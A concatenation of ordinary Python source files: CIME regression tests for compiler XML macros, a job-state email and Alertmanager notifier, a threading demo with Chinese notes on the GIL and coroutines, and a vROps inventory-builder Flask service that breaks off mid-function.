"""Test that machine-specific base value changes don't interfere with appends."""
xml1="""
<compiler COMPILER="{}">
<FFLAGS>
<base>-base1</base>
<append DEBUG="FALSE">-debug1</append>
</FFLAGS>
</compiler>""".format(self.test_compiler)
xml2="""
<compiler MACH="{}" COMPILER="{}">
<FFLAGS>
<base>-base2</base>
<append DEBUG="TRUE">-debug2</append>
</FFLAGS>
</compiler>""".format(self.test_machine, self.test_compiler)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-base2", var={"COMPILER": self.test_compiler})
tester.assert_variable_equals("FFLAGS", "-base2 -debug2", var={"COMPILER": self.test_compiler, "DEBUG": "TRUE"})
tester.assert_variable_equals("FFLAGS", "-base2 -debug1", var={"COMPILER": self.test_compiler, "DEBUG": "FALSE"})
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("FFLAGS", "-base2", var={"COMPILER": self.test_compiler})
tester.assert_variable_equals("FFLAGS", "-base2 -debug2", var={"COMPILER": self.test_compiler, "DEBUG": "TRUE"})
tester.assert_variable_equals("FFLAGS", "-base2 -debug1", var={"COMPILER": self.test_compiler, "DEBUG": "FALSE"})
def test_multilevel_specificity(self):
"""Check that settings with multiple levels of machine-specificity can be resolved."""
xml1="""
<compiler>
<MPIFC DEBUG="FALSE">mpifc</MPIFC>
</compiler>"""
xml2="""
<compiler OS="{}">
<MPIFC MPILIB="{}">mpif03</MPIFC>
</compiler>""".format(self.test_os, self.test_mpilib)
xml3="""
<compiler MACH="{}">
<MPIFC DEBUG="TRUE">mpif90</MPIFC>
</compiler>""".format(self.test_machine)
# To verify order-independence, test every possible ordering of blocks.
testers = []
testers.append(self.xml_to_tester(xml1+xml2+xml3))
testers.append(self.xml_to_tester(xml1+xml3+xml2))
testers.append(self.xml_to_tester(xml2+xml1+xml3))
testers.append(self.xml_to_tester(xml2+xml3+xml1))
testers.append(self.xml_to_tester(xml3+xml1+xml2))
testers.append(self.xml_to_tester(xml3+xml2+xml1))
for tester in testers:
tester.assert_variable_equals("MPIFC", "mpif90", var={"COMPILER": self.test_compiler, "MPILIB": self.test_mpilib, "DEBUG": "TRUE"})
tester.assert_variable_equals("MPIFC", "mpif03", var={"COMPILER": self.test_compiler, "MPILIB": self.test_mpilib, "DEBUG": "FALSE"})
tester.assert_variable_equals("MPIFC", "mpifc", var={"COMPILER": self.test_compiler, "MPILIB": "NON_MATCHING_MPI", "DEBUG": "FALSE"})
def test_remove_dependency_issues(self):
"""Check that overridden settings don't cause inter-variable dependencies."""
xml1="""
<compiler>
<MPIFC>${SFC}</MPIFC>
</compiler>"""
xml2="""
<compiler MACH="{}">""".format(self.test_machine) + """
<SFC>${MPIFC}</SFC>
<MPIFC>mpif90</MPIFC>
</compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SFC", "mpif90")
tester.assert_variable_equals("MPIFC", "mpif90")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SFC", "mpif90")
tester.assert_variable_equals("MPIFC", "mpif90")
###############################################################################
class I_TestCMakeMacros(H_TestMakeMacros):
###############################################################################
"""CMake macros tests.
This class contains tests of the CMake output of Build.
This class simply inherits all of the methods of TestMakeOutput, but changes
the definition of xml_to_tester to create a CMakeTester instead.
"""
def xml_to_tester(self, xml_string):
"""Helper that directly converts an XML string to a MakefileTester."""
test_xml = _wrap_config_compilers_xml(xml_string)
if (NO_CMAKE):
self.skipTest("Skipping cmake test")
else:
return CMakeTester(self, get_macros(self._maker, test_xml, "CMake"))
###############################################################################
class S_TestManageAndQuery(unittest.TestCase):
"""Tests various scripts to manage and query xml files"""
def _run_and_assert_query_testlist(self, extra_args=""):
"""Ensure that query_testlist runs successfully with the given extra arguments"""
files = Files()
testlist_drv = files.get_value("TESTS_SPEC_FILE", {"component":"drv"})
run_cmd_assert_result(self, "{}/query_testlists --xml-testlist {} {}".format(
SCRIPT_DIR, testlist_drv, extra_args))
def test_query_testlists_runs(self):
"""Make sure that query_testlists runs successfully
This simply makes sure that query_testlists doesn't generate any errors
when it runs. This helps ensure that changes in other utilities don't
break query_testlists.
"""
self._run_and_assert_query_testlist(extra_args="--show-options")
def test_query_testlists_define_testtypes_runs(self):
"""Make sure that query_testlists runs successfully with the --define-testtypes argument"""
self._run_and_assert_query_testlist(extra_args="--define-testtypes")
def test_query_testlists_count_runs(self):
"""Make sure that query_testlists runs successfully with the --count argument"""
self._run_and_assert_query_testlist(extra_args="--count")
def test_query_testlists_list_runs(self):
"""Make sure that query_testlists runs successfully with the --list argument"""
self._run_and_assert_query_testlist(extra_args="--list categories")
###############################################################################
class B_CheckCode(unittest.TestCase):
###############################################################################
# Tests are generated in the main loop below
longMessage = True
all_results = None
def make_pylint_test(pyfile, all_files):
def test(self):
if B_CheckCode.all_results is None:
B_CheckCode.all_results = check_code(all_files)
#pylint: disable=unsubscriptable-object
result = B_CheckCode.all_results[pyfile]
self.assertTrue(result == "", msg=result)
return test
def check_for_pylint():
#pylint: disable=import-error
from distutils.spawn import find_executable
pylint = find_executable("pylint")
if pylint is not None:
output = run_cmd_no_fail("pylint --version")
pylintver = re.search(r"pylint\s+(\d+)[.](\d+)[.](\d+)", output)
major = int(pylintver.group(1))
minor = int(pylintver.group(2))
if pylint is None or major < 1 or (major == 1 and minor < 5):
print("pylint version 1.5 or newer not found, pylint tests skipped")
return False
return True
def write_provenance_info():
curr_commit = get_current_commit(repo=LIB_DIR)
logging.info("\nTesting commit %s" % curr_commit)
cime_model = CIME.utils.get_model()
logging.info("Using cime_model = %s" % cime_model)
logging.info("Testing machine = %s" % MACHINE.get_machine_name())
if TEST_COMPILER is not None:
logging.info("Testing compiler = %s"% TEST_COMPILER)
if TEST_MPILIB is not None:
logging.info("Testing mpilib = %s"% TEST_MPILIB)
logging.info("Test root: %s" % TEST_ROOT)
logging.info("Test driver: %s\n" % CIME.utils.get_cime_default_driver())
def cleanup():
# if the TEST_ROOT directory exists and is empty, remove it
if os.path.exists(TEST_ROOT) and not os.listdir(TEST_ROOT):
print("All pass, removing directory:", TEST_ROOT)
os.rmdir(TEST_ROOT)
def _main_func(description):
global MACHINE
global NO_CMAKE
global FAST_ONLY
global NO_BATCH
global TEST_COMPILER
global TEST_MPILIB
global TEST_ROOT
global GLOBAL_TIMEOUT
global NO_TEARDOWN
config = CIME.utils.get_cime_config()
help_str = \
"""
{0} [TEST] [TEST]
OR
{0} --help
\033[1mEXAMPLES:\033[0m
\033[1;32m# Run the full suite \033[0m
> {0}
\033[1;32m# Run all code checker tests \033[0m
> {0} B_CheckCode
\033[1;32m# Run test test_wait_for_test_all_pass from class M_TestWaitForTests \033[0m
> {0} M_TestWaitForTests.test_wait_for_test_all_pass
""".format(os.path.basename(sys.argv[0]))
parser = argparse.ArgumentParser(usage=help_str,
description=description,
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--fast", action="store_true",
help="Skip full system tests, which saves a lot of time")
parser.add_argument("--no-batch", action="store_true",
help="Do not submit jobs to batch system, run locally."
" If false, will default to machine setting.")
parser.add_argument("--no-cmake", action="store_true",
help="Do not run cmake tests")
parser.add_argument("--no-teardown", action="store_true",
help="Do not delete directories left behind by testing")
parser.add_argument("--machine",
help="Select a specific machine setting for cime")
parser.add_argument("--compiler",
help="Select a specific compiler setting for cime")
parser.add_argument( "--mpilib",
help="Select a specific compiler setting for cime")
parser.add_argument( "--test-root",
help="Select a specific test root for all cases created by the testing")
parser.add_argument("--timeout", type=int,
help="Select a specific timeout for all tests")
ns, args = parser.parse_known_args()
# Now set the sys.argv to the unittest_args (leaving sys.argv[0] alone)
sys.argv[1:] = args
FAST_ONLY = ns.fast
NO_BATCH = ns.no_batch
NO_CMAKE = ns.no_cmake
GLOBAL_TIMEOUT = ns.timeout
NO_TEARDOWN = ns.no_teardown
if ns.machine is not None:
MACHINE = Machines(machine=ns.machine)
os.environ["CIME_MACHINE"] = ns.machine
elif "CIME_MACHINE" in os.environ:
mach_name = os.environ["CIME_MACHINE"]
MACHINE = Machines(machine=mach_name)
elif config.has_option("create_test", "MACHINE"):
MACHINE = Machines(machine=config.get("create_test", "MACHINE"))
elif config.has_option("main", "MACHINE"):
MACHINE = Machines(machine=config.get("main", "MACHINE"))
else:
MACHINE = Machines()
if ns.compiler is not None:
TEST_COMPILER = ns.compiler
elif config.has_option("create_test", "COMPILER"):
TEST_COMPILER = config.get("create_test", "COMPILER")
elif config.has_option("main", "COMPILER"):
TEST_COMPILER = config.get("main", "COMPILER")
if ns.mpilib is not None:
TEST_MPILIB = ns.mpilib
elif config.has_option("create_test", "MPILIB"):
TEST_MPILIB = config.get("create_test", "MPILIB")
elif config.has_option("main", "MPILIB"):
TEST_MPILIB = config.get("main", "MPILIB")
if ns.test_root is not None:
TEST_ROOT = ns.test_root
elif config.has_option("create_test", "TEST_ROOT"):
TEST_ROOT = config.get("create_test", "TEST_ROOT")
else:
TEST_ROOT = os.path.join(MACHINE.get_value("CIME_OUTPUT_ROOT"),
"scripts_regression_test.%s"% CIME.utils.get_timestamp())
args = lambda: None # just something to set attrs on
for log_param in ["debug", "silent", "verbose"]:
flag = "--%s" % log_param
if flag in sys.argv:
sys.argv.remove(flag)
setattr(args, log_param, True)
else:
setattr(args, log_param, False)
args = CIME.utils.parse_args_and_handle_standard_logging_options(args, None)
write_provenance_info()
atexit.register(cleanup)
# Find all python files in repo and create a pylint test for each
if check_for_pylint():
files_to_test = get_all_checkable_files()
for file_to_test in files_to_test:
pylint_test = make_pylint_test(file_to_test, files_to_test)
testname = "test_pylint_%s" % file_to_test.replace("/", "_").replace(".", "_")
expect(not hasattr(B_CheckCode, testname), "Repeat %s" % testname)
setattr(B_CheckCode, testname, pylint_test)
try:
unittest.main(verbosity=2, catchbreak=True)
except CIMEError as e:
if e.__str__() != "False":
print("Detected failures, leaving directory:", TEST_ROOT)
raise
if (__name__ == "__main__"):
_main_func(__doc__)
|
notify.py
|
#!/usr/bin/env python3
import threading
import time
import logging
import json
import smtplib
from queue import Queue
from queue import Empty
import requests
logger = logging.getLogger(__name__)
class NotifyMsg(object):
def __init__(self, email, alert_name):
self.email = email
self.alert_name = alert_name
def labels(self):
raise NotImplementedError()
def subject(self):
raise NotImplementedError()
def body(self):
return self.subject()
class JobStateChangedMsg(NotifyMsg):
def __init__(self, email, alert_name, job_name, job_state):
super(JobStateChangedMsg, self).__init__(email, alert_name)
self.job_name = job_name
self.job_state = job_state
def labels(self):
return {"job_name": self.job_name, "job_state": self.job_state}
def subject(self):
return "Your job %s has changed to state of %s" % (self.job_name,
self.job_state)
def new_job_state_change_message(email, job_name, state):
return JobStateChangedMsg(email, "job-state-changed", job_name, state)
class Notifier(object):
def __init__(self, config):
self.queue = Queue()
self.running = False
self.thread = None
self.cluster = None
self.alert_manager_url = None
self.smtp_url = self.smtp_from = self.smtp_auth_name = self.smtp_auth_pass = None
if config is not None and "notifier" in config:
notifier_config = config["notifier"]
self.cluster = notifier_config.get("cluster")
self.smtp_url = notifier_config.get("smtp-url")
self.smtp_from = notifier_config.get("smtp-from")
self.smtp_auth_name = notifier_config.get("smtp-auth-username")
self.smtp_auth_pass = notifier_config.get("smtp-auth-password")
alert_manager_url = notifier_config.get("alert-manager-url")
if alert_manager_url is not None and len(alert_manager_url) > 0:
if alert_manager_url[-1] == "/":
self.alert_manager_url = alert_manager_url + "api/v1/alerts"
else:
self.alert_manager_url = alert_manager_url + "/api/v1/alerts"
if self.cluster is None or \
self.alert_manager_url is None and (
self.smtp_url is None or
self.smtp_from is None or
self.smtp_auth_name is None or
self.smtp_auth_pass is None):
logger.warning("Notifier not configured")
def start(self):
if not self.running:
self.running = True
self.thread = threading.Thread(target=self.process, name="notifier")
self.thread.start()
def stop(self):
if self.running:
self.running = False
self.thread.join()
self.thread = None
def notify(self, msg):
self.queue.put(msg)
def process(self):
while self.running:
try:
msg = self.queue.get(block=True, timeout=1) # 1s timeout
except Empty:
continue
retry_count = 0
sent = False
while retry_count < 3:
if self.send(msg):
sent = True
break
time.sleep(0.2)
retry_count += 1
if not sent:
logger.error("failed to send out, discard msg: %s", msg)
def send(self, msg):
subject = msg.subject()
try:
if self.alert_manager_url is not None:
labels = msg.labels()
labels.update({
"alertname": msg.alert_name,
"type": "user_alert",
"cluster": self.cluster,
"user_email": msg.email,
"subject": subject,
})
resp = requests.post(self.alert_manager_url,
timeout=5,
data=json.dumps([{
"labels": labels
}]))
resp.raise_for_status()
return True
elif self.smtp_url is not None and \
self.smtp_from is not None and \
self.smtp_auth_name is not None and \
self.smtp_auth_pass is not None:
smtp_send_email(self.smtp_url, self.smtp_from,
self.smtp_auth_name, self.smtp_auth_pass,
msg.email, subject, msg.body())
return True
else:
# not configured, discard message
return True
except Exception as e:
logger.exception("sending email failed")
return False
def smtp_send_email(smtp_url, smtp_from, smtp_auth_name, smtp_auth_pass, to,
subject, body):
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n%s" % (smtp_from, to,
subject, body)
conn = smtplib.SMTP(smtp_url)
conn.starttls()
conn.login(smtp_auth_name, smtp_auth_pass)
conn.sendmail(smtp_from, to, msg)
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
level=logging.INFO)
notifier = Notifier({
"notifier": {
"cluster": "local",
"alert-manager-url": "http://localhost:9093/alert-manager"
}
})
notifier.start()
notifier.notify(
new_job_state_change_message("dixu@microsoft.com", "job-id", "stopped"))
notifier.stop()
|
Chapter16_AsyncIO_01.py
|
# coding=utf-8
import threading
import time
def get_body(i):
print("start", i)
time.sleep(2)
print("end", i)
for i in range(5):
t = threading.Thread(target=get_body, args=(i,))
t.start()
# ### 进程与线程
# 进程是应用程序的启动实例,拥有代码和打开的文件资源、数据资源、独立的内存空间,是资源分配的最小单位;
# 线程从属于进程,作为单一顺序的控制流被包含在进程之中,是进程中的实际运作单位,线程拥有自己的栈空间;
# 线程拥有自己的栈空间,是操作系统能够进行CPU运算调度的最小单位;
# 一个进程至少包含一个主线程,也可以并发多个线程,每个线程并行执行不同的任务;
# 简而言之,对操作系统来说,线程是最小的执行单元,进程是最小的资源管理单元;
# 相比进程,线程易于调度、开销少、利于提高并发性;
#
# ### 多线程的执行
# 在Python虚拟机按照以下方式执行:
# 1. 设置GIL;
# 2. 切换到一个线程去运行;
# 3. 运行指定数量的字节码指令,或者线程主动让出控制(调用time.sleep(0));
# 4. 把线程设置为睡眠状态;
# 5. 解锁GIL;
# 6. 再次重复以上所有步骤;
#
# ### GIL(Global Interpreter Lock,全局解释器锁)
# 由于GIL的限制,在解释器主循环(Python虚拟机)中,任意时刻,只能有一个线程在解释器中运行;
# GIL不是Python的特性,而是在实现Python解析器CPython时所引入的一个概念,在JPython中就没有GIL的概念;
# 也就是说,CPython的多线程并没有实现真正意义上的并发;
#
# ### 任务类型
# 在Python中,并发(concurrency)实现方式有三种:通过线程(threading)、多进程(multiprocessing)和Asyncio;
# 不同的方式适用不同的任务类型和场景;
# CPU(计算)密集型任务:由于GIL的存在,通常使用多进程来实现;
# IO密集型任务:
# - 通过线程调度来让线程在执行IO任务时让出GIL,从而实现表面上的并发;
# - 通过协程(运行在单线程当中的“并发”);
#
# ### 协程(Coroutines)
# 协程是一种比线程更加轻量级的存在,一个线程可以拥有多个协程;
# 协程完全是由程序所控制(在用户态执行),而不是被操作系统内核所管理,性能得到很大提升,不会像线程切换那样消耗资源。
#
# ### 并发中的多进程、多线程与协程
# 多进程、多线程与协程都可以用来实现并发任务,但协程的实现更为高效;
# - 多进程和多线程的IO调度取决于系统;
# - 协程的IO调度来自用户,用户可以在函数中yield一个状态;
|
InventoryBuilder.py
|
from flask import Flask
from gevent.pywsgi import WSGIServer
from threading import Thread
from resources.Resourceskinds import NSXTMgmtPlane
from tools.Vrops import Vrops
import time
import json
import os
import logging
logger = logging.getLogger('vrops-exporter')
class InventoryBuilder:
def __init__(self, atlas_config, port, sleep, timeout):
self.atlas_config = atlas_config
self.port = int(port)
self.sleep = sleep
self.timeout = int(timeout)
self._user = os.environ["USER"]
self._password = os.environ["PASSWORD"]
self.vcenter_dict = dict()
self.nsxt_dict = dict()
self.target_tokens = dict()
self.iterated_inventory = dict()
self.vrops_collection_times = dict()
self.response_codes = dict()
self.alertdefinitions = dict()
self.successful_iteration_list = [0]
self.wsgi_address = '0.0.0.0'
if 'LOOPBACK' in os.environ:
if os.environ['LOOPBACK'] == '1':
self.wsgi_address = '127.0.0.1'
thread = Thread(target=self.run_rest_server)
thread.start()
self.query_inventory_permanent()
def run_rest_server(self):
app = Flask(__name__)
logger.info(f'serving /vrops_list on {self.port}')
@app.route('/vrops_list', methods=['GET'])
def vrops_list():
return json.dumps(self.vrops_list)
logger.info(f'serving /inventory on {self.port}')
@app.route('/<target>/vcenters/<int:iteration>', methods=['GET'])
def vcenters(target, iteration):
return self.iterated_inventory[str(iteration)]['vcenters'].get(target, {})
@app.route('/<target>/datacenters/<int:iteration>', methods=['GET'])
def datacenters(target, iteration):
return self.iterated_inventory[str(iteration)]['datacenters'].get(target, {})
@app.route('/<target>/clusters/<int:iteration>', methods=['GET'])
def clusters(target, iteration):
return self.iterated_inventory[str(iteration)]['clusters'].get(target, {})
@app.route('/<target>/hosts/<int:iteration>', methods=['GET'])
def hosts(target, iteration):
return self.iterated_inventory[str(iteration)]['hosts'].get(target, {})
@app.route('/<target>/datastores/<int:iteration>', methods=['GET'])
def datastores(target, iteration):
return self.iterated_inventory[str(iteration)]['datastores'].get(target, {})
@app.route('/<target>/vms/<int:iteration>', methods=['GET'])
def vms(target, iteration):
return self.iterated_inventory[str(iteration)]['vms'].get(target, {})
@app.route('/<target>/nsxt_adapter/<int:iteration>', methods=['GET'])
def nsxt_adapter(target, iteration):
return self.iterated_inventory[str(iteration)]['nsxt_adapter'].get(target, {})
@app.route('/<target>/nsxt_mgmt_cluster/<int:iteration>', methods=['GET'])
def nsxt_mgmt_cluster(target, iteration):
return self.iterated_inventory[str(iteration)]['nsxt_mgmt_cluster'].get(target, {})
@app.route('/<target>/nsxt_mgmt_nodes/<int:iteration>', methods=['GET'])
def nsxt_mgmt_nodes(target, iteration):
return self.iterated_inventory[str(iteration)]['nsxt_mgmt_nodes'].get(target, {})
@app.route('/<target>/nsxt_mgmt_service/<int:iteration>', methods=['GET'])
def nsxt_mgmt_service(target, iteration):
return self.iterated_inventory[str(iteration)]['nsxt_mgmt_service'].get(target, {})
@app.route('/alertdefinitions/', methods=['GET'])
def alert_alertdefinitions():
return self.alertdefinitions
@app.route('/iteration', methods=['GET'])
def iteration():
return_iteration = self.successful_iteration_list[-1]
return str(return_iteration)
@app.route('/collection_times', methods=['GET'])
def collection_times():
vrops_collection_times = self.vrops_collection_times
return json.dumps(vrops_collection_times)
@app.route('/api_response_codes', methods=['GET'])
def api_response_codes():
response_codes = self.response_codes
return json.dumps(response_codes)
# debugging purpose
@app.route('/iteration_store', methods=['GET'])
def iteration_store():
return_iteration = self.successful_iteration_list
return json.dumps(return_iteration)
# FIXME: this could basically be the always active token list. no active token? refresh!
@app.route('/target_tokens', methods=['GET'])
def token():
return json.dumps(self.target_tokens)
try:
if logger.level == 10:
# WSGi is logging on DEBUG Level
WSGIServer((self.wsgi_address, self.port), app).serve_forever()
else:
WSGIServer((self.wsgi_address, self.port), app, log=None).serve_forever()
except TypeError as e:
logger.error('Problem starting server, you might want to try LOOPBACK=0 or LOOPBACK=1')
logger.error(f'Current used options: {self.wsgi_address} on port {self.port}')
logger.error(f'TypeError: {e}')
def get_vrops(self):
with open(self.atlas_config) as json_file:
netbox_json = json.load(json_file)
self.vrops_list = [target['labels']['server_name'] for target in netbox_json if
target['labels']['job'] == "vrops"]
def query_inventory_permanent(self):
# first iteration to fill is 1. while this is not ready,
# curl to /iteration would still report 0 to wait for actual data
self.iteration = 1
while True:
# get vrops targets every run in case we have new targets appearing
self.get_vrops()
if len(self.successful_iteration_list) > 3:
iteration_to_be_deleted = self.successful_iteration_list.pop(0)
# initial case, since 0 is never filled in iterated_inventory
if iteration_to_be_deleted == 0:
continue
self.iterated_inventory.pop(str(iteration_to_be_deleted))
logger.debug(f'deleting iteration {iteration_to_be_deleted}')
# initialize empty inventory per iteration
self.iterated_inventory[str(self.iteration)] = dict()
logger.info(f'real run {self.iteration}')
threads = list()
for vrops in self.vrops_list:
self.response_codes[vrops] = dict()
vrops_short_name = vrops.split('.')[0]
thread = Thread(target=self.query_vrops, args=(vrops, vrops_short_name, self.iteration))
thread.start()
threads.append((thread, vrops))
timeout = self.timeout
timeout_reached = False
start_time = time.time()
current_time = start_time
joined_threads = dict()
while current_time <= (start_time + timeout):
for t in threads:
if not t[0].is_alive():
t[0].join()
if t[0] not in joined_threads:
joined_threads.setdefault(t[1], round(time.time() - start_time))
if len(joined_threads.keys()) >= len(threads):
break
time.sleep(1)
current_time = time.time()
else:
still_running = [t for t in threads if t[0].is_alive()]
for running_thread in still_running:
logger.info(f"Timeout {timeout}s reached for fetching {running_thread[1]}")
running_thread[0].join(0)
timeout_reached = True
for vrops in joined_threads:
self.vrops_collection_times[vrops] = joined_threads[vrops]
logger.info(f"Fetched {vrops} in {joined_threads[vrops]}s")
self.provide_vcenters()
self.provide_datacenters()
self.provide_clusters()
self.provide_hosts()
self.provide_datastores()
self.provide_vms()
self.provide_nsxt_adapter()
self.provide_nsxt_mgmt_cluster()
self.provide_nsxt_mgmt_nodes()
self.provide_nsxt_mgmt_service()
if len(self.iterated_inventory[str(self.iteration)]['vcenters']) > 0:
self.successful_iteration_list.append(self.iteration)
else:
# immediately withdraw faulty inventory
logger.debug(f'Withdrawing current iteration: {self.iteration}')
self.iterated_inventory.pop(str(self.iteration))
self.iteration += 1
if not timeout_reached:
logger.info(f'Inventory relaxing before going to work again in {self.sleep}s')
time.sleep(int(self.sleep))
def query_vrops(self, target, vrops_short_name, iteration):
vrops = Vrops()
logger.info(f'Querying {target}')
token, self.response_codes[target]["token"] = Vrops.get_token(target=target)
if not token:
logger.warning(f'retrying connection to {target} in next iteration {self.iteration + 1}')
return False
self.target_tokens[target] = token
logger.info(f'########## Collecting resources {vrops_short_name}... ##########')
vcenter = self.create_vcenter_objects(vrops, target, token)
nsxt_adapter = self.create_nsxt_objects(vrops, target, token)
self.vcenter_dict[vrops] = vcenter
self.nsxt_dict[vrops] = nsxt_adapter
if iteration == 1:
self.alertdefinitions = Vrops.get_alertdefinitions(vrops, target, token)
return True
def create_vcenter_objects(self, vrops, target: str, token: str):
vcenter_adapter, self.response_codes[target]["vcenter"] = Vrops.get_vcenter_adapter(vrops, target, token)
# just one vcenter adapter supported
vcenter_adapter = vcenter_adapter[0]
if not vcenter_adapter:
logger.critical(f'Could not get vcenter adapter!')
return False
logger.debug(f'Collecting vcenter: {vcenter_adapter.name}')
datacenter, self.response_codes[target]["datacenters"] = \
Vrops.get_datacenter(vrops, target, token, [vcenter_adapter.uuid])
cluster, self.response_codes[target]["clusters"] = \
Vrops.get_cluster(vrops, target, token, [dc.uuid for dc in datacenter])
datastores, self.response_codes[target]["datastores"] = \
Vrops.get_datastores(vrops, target, token, [dc.uuid for dc in datacenter])
hosts, self.response_codes[target]["hosts"] = \
Vrops.get_hosts(vrops, target, token, [cl.uuid for cl in cluster])
vms, self.response_codes[target]["vms"] = \
Vrops.get_vms(vrops, target, token, [hs.uuid for hs in hosts], vcenter_adapter.uuid)
for dc in datacenter:
vcenter_adapter.add_datacenter(dc)
for dc_object in vcenter_adapter.datacenter:
logger.debug(f'Collecting datacenter: {dc_object.name}')
for ds in datastores:
if ds.parent == dc_object.uuid:
dc_object.add_datastore(ds)
logger.debug(f'Collecting datastore: {ds.name}')
for cl in cluster:
dc_object.add_cluster(cl)
for cl_object in dc_object.clusters:
logger.debug(f'Collecting cluster: {cl_object.name}')
for hs in hosts:
if hs.parent == cl_object.uuid:
cl_object.add_host(hs)
for hs_object in cl_object.hosts:
logger.debug(f'Collecting host: {hs_object.name}')
for vm in vms:
if vm.parent == hs_object.uuid:
hs_object.add_vm(vm)
logger.debug(f'Collecting VM: {vm.name}')
return vcenter_adapter
def create_nsxt_objects(self, vrops, target: str, token: str):
nsxt_adapter, self.response_codes[target]["nsxt_adapter"] = Vrops.get_nsxt_adapter(vrops, target, token)
if not nsxt_adapter:
return False
nsxt_mgmt_plane = NSXTMgmtPlane(target, token)
for adapter in nsxt_adapter:
logger.debug(f'Collecting NSX-T adapter: {adapter.name}')
nsxt_mgmt_plane.add_adapter(adapter)
nsxt_mgmt_cluster, self.response_codes[target]["nsxt_mgmt_cluster"] = \
Vrops.get_nsxt_mgmt_cluster(vrops, target,token,[a.uuid for a in nsxt_adapter])
nsxt_mgmt_nodes, self.response_codes[target]["nsxt_mgmt_nodes"] = \
Vrops.get_nsxt_mgmt_nodes(vrops, target, token, [c.uuid for c in nsxt_mgmt_cluster])
nsxt_mgmt_service, self.response_codes[target]["nsxt_mgmt_services"] = \
Vrops.get_nsxt_mgmt_service(vrops, target, token, [n.uuid for n in nsxt_mgmt_nodes])
for nsxt_adapter_object in nsxt_mgmt_plane.adapter:
for mgmt_cluster in nsxt_mgmt_cluster:
if mgmt_cluster.parent == nsxt_adapter_object.uuid:
nsxt_adapter_object.add_mgmt_cluster(mgmt_cluster)
logger.debug(f'Collecting NSX-T management cluster: {mgmt_cluster.name}')
for mgmt_cluster_object in nsxt_adapter_object.management_cluster:
for mgmt_node in nsxt_mgmt_nodes:
if mgmt_node.parent == mgmt_cluster_object.uuid:
mgmt_cluster_object.add_mgmt_node(mgmt_node)
logger.debug(f'Collecting NSX-T management node: {mgmt_node.name}')
for nsxt_mgmt_node in mgmt_cluster_object.management_nodes:
for mgmt_service_instance in nsxt_mgmt_service:
if mgmt_service_instance.parent == nsxt_mgmt_node.uuid:
nsxt_mgmt_node.add_mgmt_service(mgmt_service_instance)
logger.debug(f'Collecting NSX-T management service: {mgmt_service_instance.name}')
return nsxt_mgmt_plane
def provide_vcenters(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
tree[vcenter.target][vcenter.uuid] = {
'uuid': vcenter.uuid,
'name': vcenter.name,
'kind_dc_name': dc.name,
'kind_dc_uuid': dc.uuid,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['vcenters'] = tree
return tree
def provide_datacenters(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
tree[vcenter.target][dc.uuid] = {
'uuid': dc.uuid,
'name': dc.name,
'parent_vcenter_uuid': vcenter.uuid,
'parent_vcenter_name': vcenter.name,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['datacenters'] = tree
return tree
def provide_datastores(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
for datastore in dc.datastores:
tree[vcenter.target][datastore.uuid] = {
'uuid': datastore.uuid,
'name': datastore.name,
'parent_dc_uuid': dc.uuid,
'parent_dc_name': dc.name,
'type': datastore.type,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['datastores'] = tree
return tree
def provide_clusters(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
for cluster in dc.clusters:
tree[vcenter.target][cluster.uuid] = {
'uuid': cluster.uuid,
'name': cluster.name,
'parent_dc_uuid': dc.uuid,
'parent_dc_name': dc.name,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['clusters'] = tree
return tree
def provide_hosts(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
for cluster in dc.clusters:
for host in cluster.hosts:
tree[vcenter.target][host.uuid] = {
'uuid': host.uuid,
'name': host.name,
'parent_cluster_uuid': cluster.uuid,
'parent_cluster_name': cluster.name,
'datacenter': dc.name,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['hosts'] = tree
return tree
def provide_vms(self) -> dict:
tree = dict()
for vcenter_entry in self.vcenter_dict:
vcenter = self.vcenter_dict[vcenter_entry]
if not vcenter:
continue
tree[vcenter.target] = dict()
for dc in vcenter.datacenter:
for cluster in dc.clusters:
for host in cluster.hosts:
for vm in host.vms:
tree[vcenter.target][vm.uuid] = {
'uuid': vm.uuid,
'name': vm.name,
'parent_host_uuid': host.uuid,
'parent_host_name': host.name,
'cluster': cluster.name,
'datacenter': dc.name,
'vcenter': vcenter.name,
'target': vcenter.target,
'token': vcenter.token,
}
self.iterated_inventory[str(self.iteration)]['vms'] = tree
return tree
def provide_nsxt_adapter(self) -> dict:
tree = dict()
for nsxt_entry in self.nsxt_dict:
nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry]
if not nsxt_mgmt_plane:
continue
tree[nsxt_mgmt_plane.target] = dict()
for nsxt_adapter in nsxt_mgmt_plane.adapter:
tree[nsxt_mgmt_plane.target][nsxt_adapter.uuid] = {
'uuid': nsxt_adapter.uuid,
'name': nsxt_adapter.name,
'target': nsxt_mgmt_plane.target,
